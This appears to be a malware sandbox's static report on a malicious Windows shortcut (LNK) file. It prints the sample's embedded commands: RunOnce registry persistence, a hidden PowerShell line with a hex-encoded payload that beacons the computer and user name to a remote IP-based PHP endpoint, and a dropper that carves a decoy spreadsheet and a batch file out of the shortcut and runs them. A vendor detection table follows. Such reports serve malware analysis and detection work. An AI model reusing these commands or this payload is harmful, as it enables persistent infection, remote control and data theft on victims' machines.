Static | ZeroBOX

Windows

SysWOW64

cmd.exe

Systems

C:\Windows\SysWOW64\cmd.exe

%windir%\SysWow64\cmd.exe

desktop-nlug7h3

[Content_Types].xml

_rels/.rels

r:"y_dl

xl/_rels/workbook.xml.rels

xl/workbook.xml

%p2NEL%l

;,iGt2

HM/n3*

xl/sharedStrings.xml

[ |lp

Y>v$/4

xl/worksheets/_rels/sheet1.xml.rels

xl/theme/theme1.xml

^Va|PQm&

xl/styles.xml

9@?^@+

j-au/C

xl/worksheets/sheet1.xml

"CqTD

docProps/core.xml

xl/printerSettings/printerSettings1.bin

Ww@?[us

docProps/app.xml

[Content_Types].xmlPK

_rels/.relsPK

xl/_rels/workbook.xml.relsPK

xl/workbook.xmlPK

xl/sharedStrings.xmlPK

xl/worksheets/_rels/sheet1.xml.relsPK

xl/theme/theme1.xmlPK

xl/styles.xmlPK

xl/worksheets/sheet1.xmlPK

docProps/core.xmlPK

xl/printerSettings/printerSettings1.binPK

docProps/app.xmlPK

copy %~f0 "%appdata%\Microsoft\Protect\UserProfileSafeBackup.bat"

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v BackupUserProfiles /t REG_SZ /f /d "C:\Windows\SysWOW64\cmd.exe /c %appdata%\Microsoft\Protect\UserProfileSafeBackup.bat"

start /min C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$m6drsidu ="$jWHmcU="""53746172742D536C656570202D5365636F6E64732036373B0D0A246E76536B6C55626151203D2031303234202A20313032343B0D0A247969786773465679203D2024656E763A434F4D50555445524E414D45202B20272D27202B2024656E763A555345524E414D452B272D5348273B0D0A24615777203D2027687474703A2F2F37352E3131392E3133362E3230372F636F6E6669672F62617365732F636F6E6669672E70687027202B20273F553D27202B202479697867734656793B0D0A24624C6D6F69667148774A786845203D2024656E763A54454D50202B20272F4B734B273B0D0A696620282128546573742D506174682024624C6D6F69667148774A7868452929207B0D0A204E65772D4974656D50726F7065727479202D506174682022484B43553A5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E4F6E636522202D4E616D65204F6C6D202D56616C75652027633A5C77696E646F77735C73797374656D33325C636D642E657865202F6320506F7765725368656C6C2E657865202D57696E646F775374796C652068696464656E202D4E6F4C6F676F202D4E6F6E496E746572616374697665202D65702062

Windows

SysWOW64

Zcmd.exe

/c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = '%temp%'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = '%temp%\

.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^| select -Skip 62464)) -Encoding Byte; ^& $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = '%temp%\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj ^| select -Skip 74342)) -Encoding Byte;^& %windir%\SysWOW64\cmd.exe /c $WH9lSPHOFI;+D:\C2 Framwork\InkMaker v1\HncApp\HCell.exe

%windir%\SysWow64\cmd.exe

S-1-5-21-705038708-2297707503-179203116-1001

Antivirus	Signature
Bkav	Clean
Lionic	Trojan.WinLNK.Runner.4!c
MicroWorld-eScan	Heur.BZC.YAX.Boxter.949.2AF87C59
ClamAV	Clean
CMC	Clean
CAT-QuickHeal	Clean
McAfee	Clean
Malwarebytes	Clean
Zillya	Clean
Sangfor	Clean
K7AntiVirus	Clean
K7GW	Clean
Baidu	Clean
VirIT	Clean
Cyren	LNK/ABRisk.IJLC-5
Symantec	Trojan.Gen.NPE.C
ESET-NOD32	a variant of Generik.EFPMBAR
TrendMicro-HouseCall	Clean
Avast	Other:Malware-gen [Trj]
Cynet	Clean
Kaspersky	HEUR:Trojan.Multi.Runner.ag
BitDefender	Heur.BZC.YAX.Boxter.949.2AF87C59
NANO-Antivirus	Clean
SUPERAntiSpyware	Clean
Sophos	Troj/LnkDrop-M
F-Secure	Clean
DrWeb	Clean
VIPRE	Heur.BZC.YAX.Boxter.949.2AF87C59
TrendMicro	HEUR_LNKEXEC.A
McAfee-GW-Edition	Clean
FireEye	Heur.BZC.YAX.Boxter.949.2AF87C59
Emsisoft	Heur.BZC.YAX.Boxter.949.2AF87C59 (B)
Ikarus	Trojan.SuspectCRC
Jiangmin	Clean
Avira	Clean
MAX	malware (ai score=81)
Antiy-AVL	Clean
Microsoft	Clean
Gridinsoft	Clean
Xcitium	Clean
Arcabit	Heur.BZC.YAX.Boxter.949.2AF87C59 [many]
ViRobot	Clean
ZoneAlarm	HEUR:Trojan.Multi.Runner.ag
GData	Heur.BZC.YAX.Boxter.949.2C4861AB
Google	Detected
AhnLab-V3	Dropper/LNK.Generic.S2241
Acronis	Clean
BitDefenderTheta	Clean
ALYac	Heur.BZC.YAX.Boxter.949.2C4861AB
TACHYON	Clean
VBA32	Trojan.Link.Crafted
Zoner	Probably Heur.LNKScript
Rising	Trojan.PSRunner/LNK!1.BADE (CLASSIC)
Yandex	Clean
SentinelOne	Static AI - Suspicious LNK
MaxSecure	Clean
Fortinet	LNK/Agent.24B2!tr
AVG	Other:Malware-gen [Trj]
Panda	Clean

Antivirus

Signature

Bkav

Clean

Lionic

Trojan.WinLNK.Runner.4!c

MicroWorld-eScan

Heur.BZC.YAX.Boxter.949.2AF87C59

ClamAV

Clean

CMC

Clean

CAT-QuickHeal

Clean

McAfee

Clean

Malwarebytes

Clean

Zillya

Clean

Sangfor

Clean

K7AntiVirus

Clean

K7GW

Clean

Baidu

Clean

VirIT

Clean

Cyren

LNK/ABRisk.IJLC-5

Symantec

Trojan.Gen.NPE.C

ESET-NOD32

a variant of Generik.EFPMBAR

TrendMicro-HouseCall

Clean

Avast

Other:Malware-gen [Trj]

Cynet

Clean

Kaspersky

HEUR:Trojan.Multi.Runner.ag

BitDefender

Heur.BZC.YAX.Boxter.949.2AF87C59

NANO-Antivirus

Clean

SUPERAntiSpyware

Clean

Sophos

Troj/LnkDrop-M

F-Secure

Clean

DrWeb

Clean

VIPRE

Heur.BZC.YAX.Boxter.949.2AF87C59

TrendMicro

HEUR_LNKEXEC.A

McAfee-GW-Edition

Clean

FireEye

Heur.BZC.YAX.Boxter.949.2AF87C59

Emsisoft

Heur.BZC.YAX.Boxter.949.2AF87C59 (B)

Ikarus

Trojan.SuspectCRC

Jiangmin

Clean

Avira

Clean

MAX

malware (ai score=81)

Antiy-AVL

Clean

Microsoft

Clean

Gridinsoft

Clean

Xcitium

Clean

Arcabit

Heur.BZC.YAX.Boxter.949.2AF87C59 [many]

ViRobot

Clean

ZoneAlarm

HEUR:Trojan.Multi.Runner.ag

GData

Heur.BZC.YAX.Boxter.949.2C4861AB

Google

Detected

AhnLab-V3

Dropper/LNK.Generic.S2241

Acronis

Clean

BitDefenderTheta

Clean

ALYac

Heur.BZC.YAX.Boxter.949.2C4861AB

TACHYON

Clean

VBA32

Trojan.Link.Crafted

Zoner

Probably Heur.LNKScript

Rising

Trojan.PSRunner/LNK!1.BADE (CLASSIC)

Yandex

Clean

SentinelOne

Static AI - Suspicious LNK

MaxSecure

Clean

Fortinet

LNK/Agent.24B2!tr

AVG

Other:Malware-gen [Trj]

Panda

Clean